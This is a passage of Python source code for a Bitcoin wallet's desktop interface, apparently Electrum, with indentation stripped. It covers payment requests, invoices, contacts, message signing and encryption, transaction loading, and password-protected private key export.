raise LnDecodeException(e) from e
pubkey = bh2u(lnaddr.pubkey.serialize())
for k,v in lnaddr.tags:
if k == 'd':
description = v
break
else:
description = ''
self.payto_e.setFrozen(True)
self.payto_e.setText(pubkey)
self.message_e.setText(description)
if lnaddr.get_amount_sat() is not None:
self.amount_e.setAmount(lnaddr.get_amount_sat())
#self.amount_e.textEdited.emit("")
self.set_onchain(False)
def set_onchain(self, b):
self._is_onchain = b
self.max_button.setEnabled(b)
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e]:
e.setText('')
e.setFrozen(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
utxos_str = {utxo.prevout.to_str() for utxo in utxos}
self.wallet.set_frozen_state_of_coins(utxos_str, freeze)
self.utxo_list.update()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = UTXOList(self)
return self.create_list_tab(self.utxo_list)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if not self.question(_("Do you want to remove {} from your wallet?").format(addr)):
return
try:
self.wallet.delete_address(addr)
except UserFacingException as e:
self.show_error(str(e))
else:
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_onchain_invoice(self, invoice: OnchainInvoice):
amount_str = self.format_amount(invoice.amount_sat) + ' ' + self.base_unit()
d = WindowModalDialog(self, _("Onchain Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
grid.addWidget(QLabel(amount_str), 1, 1)
if len(invoice.outputs) == 1:
grid.addWidget(QLabel(_("Address") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.get_address()), 2, 1)
else:
outputs_str = '\n'.join(map(lambda x: x.address + ' : ' + self.format_amount(x.value)+ self.base_unit(), invoice.outputs))
grid.addWidget(QLabel(_("Outputs") + ':'), 2, 0)
grid.addWidget(QLabel(outputs_str), 2, 1)
grid.addWidget(QLabel(_("Description") + ':'), 3, 0)
grid.addWidget(QLabel(invoice.message), 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 4, 1)
if invoice.bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70))
pr.verify(self.contacts)
grid.addWidget(QLabel(_("Requestor") + ':'), 5, 0)
grid.addWidget(QLabel(pr.get_requestor()), 5, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 6, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 6, 1)
def do_export():
key = pr.get_id()
name = str(key) + '.bip70'
fn = getSaveFileName(
parent=self,
title=_("Save invoice to file"),
filename=name,
filter="*.bip70",
config=self.config,
)
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('BIP70 invoice saved as {}').format(fn))
exportButton = EnterButton(_('Export'), do_export)
buttons = Buttons(exportButton, CloseButton(d))
else:
buttons = Buttons(CloseButton(d))
vbox.addLayout(grid)
vbox.addLayout(buttons)
d.exec_()
def show_lightning_invoice(self, invoice: LNInvoice):
lnaddr = lndecode(invoice.invoice, expected_hrp=constants.net.SEGWIT_HRP)
d = WindowModalDialog(self, _("Lightning Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Node ID") + ':'), 0, 0)
grid.addWidget(QLabel(lnaddr.pubkey.serialize().hex()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
amount_str = self.format_amount(invoice.get_amount_sat()) + ' ' + self.base_unit()
grid.addWidget(QLabel(amount_str), 1, 1)
grid.addWidget(QLabel(_("Description") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.message), 2, 1)
grid.addWidget(QLabel(_("Hash") + ':'), 3, 0)
payhash_e = ButtonsLineEdit(lnaddr.paymenthash.hex())
payhash_e.addCopyButton(self.app)
payhash_e.setReadOnly(True)
vbox.addWidget(payhash_e)
grid.addWidget(payhash_e, 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.time + invoice.exp)), 4, 1)
vbox.addLayout(grid)
invoice_e = ShowQRTextEdit(config=self.config)
invoice_e.addCopyButton(self.app)
invoice_e.setText(invoice.invoice)
vbox.addWidget(invoice_e)
vbox.addLayout(Buttons(CloseButton(d),))
d.exec_()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.db.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
'lnutil': lnutil,
})
c = commands.Commands(
config=self.config,
daemon=self.gui_object.daemon,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config','daemon']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.lightning_button = None
if self.wallet.has_lightning() and self.network:
self.lightning_button = StatusBarButton(read_QIcon("lightning_disconnected.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
self.update_lightning_icon()
sb.addPermanentWidget(self.lightning_button)
self.status_button = None
if self.network:
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), self.gui_object.show_network_dialog)
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def create_coincontrol_statusbar(self):
self.coincontrol_sb = sb = QStatusBar()
sb.setSizeGripEnabled(False)
#sb.setFixedHeight(3 * char_width_in_lineedit())
sb.setStyleSheet('QStatusBar::item {border: None;} '
+ ColorScheme.GREEN.as_stylesheet(True))
self.coincontrol_label = QLabel()
self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
sb.addWidget(self.coincontrol_label)
clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None))
clear_cc_button.setStyleSheet("margin-right: 5px;")
sb.addPermanentWidget(clear_cc_button)
sb.setVisible(False)
return sb
def set_coincontrol_msg(self, msg: Optional[str]) -> None:
if not msg:
self.coincontrol_label.setText("")
self.coincontrol_sb.setVisible(False)
return
self.coincontrol_label.setText(msg)
self.coincontrol_sb.setVisible(True)
def update_lightning_icon(self):
if self.lightning_button is None:
return
if self.network.lngossip is None:
return
# display colorful lightning icon to signal connection
self.lightning_button.setIcon(read_QIcon("lightning.png"))
cur, total, progress_percent = self.network.lngossip.get_sync_progress_estimate()
# self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}")
progress_str = "??%"
if progress_percent is not None:
progress_str = f"{progress_percent}%"
if progress_percent and progress_percent >= 100:
self.lightning_button.setMaximumWidth(25)
self.lightning_button.setText('')
self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced."))
else:
self.lightning_button.setMaximumWidth(25 + 5 * char_width_in_lineedit())
self.lightning_button.setText(progress_str)
self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n"
"Payments are more likely to succeed with a more complete graph."))
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
def change_password_dialog(self):
from electrum.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
vbox = QVBoxLayout()
wallet_type = self.wallet.db.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
# lightning
grid.addWidget(QLabel(_('Lightning') + ':'), 5, 0)
if self.wallet.can_have_lightning():
grid.addWidget(QLabel(_('Enabled')), 5, 1)
local_nodeid = QLabel(bh2u(self.wallet.lnworker.node_keypair.pubkey))
local_nodeid.setTextInteractionFlags(Qt.TextSelectableByMouse)
grid.addWidget(QLabel(_('Lightning Node ID:')), 6, 0)
grid.addWidget(local_nodeid, 6, 1, 1, 3)
else:
grid.addWidget(QLabel(_("Not available for this wallet.")), 5, 1)
grid.addWidget(HelpButton(_("Lightning is currently restricted to HD wallets with p2wpkh addresses.")), 5, 2)
vbox.addLayout(grid)
labels_clayout = None
if self.wallet.is_deterministic():
keystores = self.wallet.get_keystores()
ks_stack = QStackedWidget()
def select_ks(index):
ks_stack.setCurrentIndex(index)
# only show the combobox in case multiple accounts are available
if len(keystores) > 1:
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: select_ks(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Select keystore"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
for ks in keystores:
ks_w = QWidget()
ks_vbox = QVBoxLayout()
ks_vbox.setContentsMargins(0, 0, 0, 0)
ks_w.setLayout(ks_vbox)
mpk_text = ShowQRTextEdit(ks.get_master_public_key(), config=self.config)
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
run_hook('show_xpub_button', mpk_text, ks)
der_path_hbox = QHBoxLayout()
der_path_hbox.setContentsMargins(0, 0, 0, 0)
der_path_hbox.addWidget(QLabel(_("Derivation path") + ':'))
der_path_text = QLabel(ks.get_derivation_prefix() or _("unknown"))
der_path_text.setTextInteractionFlags(Qt.TextSelectableByMouse)
der_path_hbox.addWidget(der_path_text)
der_path_hbox.addStretch()
ks_vbox.addWidget(QLabel(_("Master Public Key")))
ks_vbox.addWidget(mpk_text)
ks_vbox.addLayout(der_path_hbox)
ks_stack.addWidget(ks_w)
select_ks(0)
vbox.addWidget(ks_stack)
vbox.addStretch(1)
btn_export_info = run_hook('wallet_info_buttons', self, dialog)
btn_close = CloseButton(dialog)
btns = Buttons(btn_export_info, btn_close)
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase, config=self.config)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None, *,
help_text=None, show_copy_text_btn=False):
if not data:
return
d = QRDialog(
data=data,
parent=parent or self,
title=title,
help_text=help_text,
show_copy_text_btn=show_copy_text_btn,
config=self.config,
)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk, config=self.config)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']:
from electrum.transaction import tx_from_any
try:
return tx_from_any(data)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def import_channel_backup(self, encrypted: str):
if not self.question('Import channel backup?'):
return
try:
self.wallet.lnbackups.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(repr(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'):
self.pay_to_URI(data)
return
if data.lower().startswith('channel_backup:'):
self.import_channel_backup(data)
return
# else if the user scanned an offline signed tx
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = getOpenFileName(
parent=self,
title=_("Select your transaction file"),
filter=TRANSACTION_FILE_EXTENSION_FILTER_ANY,
config=self.config,
)
if not fileName:
return
try:
with open(fileName, "rb") as f:
file_content = f.read() # type: Union[str, bytes]
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason),
title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(
parent=self,
title=_('Input raw transaction'),
header_layout=_("Transaction:"),
ok_label=_("Load transaction"),
config=self.config,
)
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_text_channel_backup(self):
text = text_dialog(
parent=self,
title=_('Input channel backup'),
header_layout=_("Channel Backup:"),
ok_label=_("Load backup"),
config=self.config,
)
if not text:
return
if text.startswith('channel_backup:'):
self.import_channel_backup(text)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except UntrustedServerReturnedError as e:
self.logger.info(f"Error getting transaction from network: {repr(e)}")
self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui())
return
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
else:
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
os.chmod(fileName, 0o600)
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import)
def do_export_labels(self):
export_meta_gui(self, _('labels'), self.wallet.export_labels)
def import_invoices(self):
import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update)
def export_invoices(self):
export_meta_gui(self, _('invoices'), self.wallet.export_invoices)
def import_requests(self):
import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update)
def export_requests(self):
export_meta_gui(self, _('requests'), self.wallet.export_requests)
def import_contacts(self):
import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update)
def export_contacts(self):
export_meta_gui(self, _('contacts'), self.contacts.export_file)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True, config=self.config)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
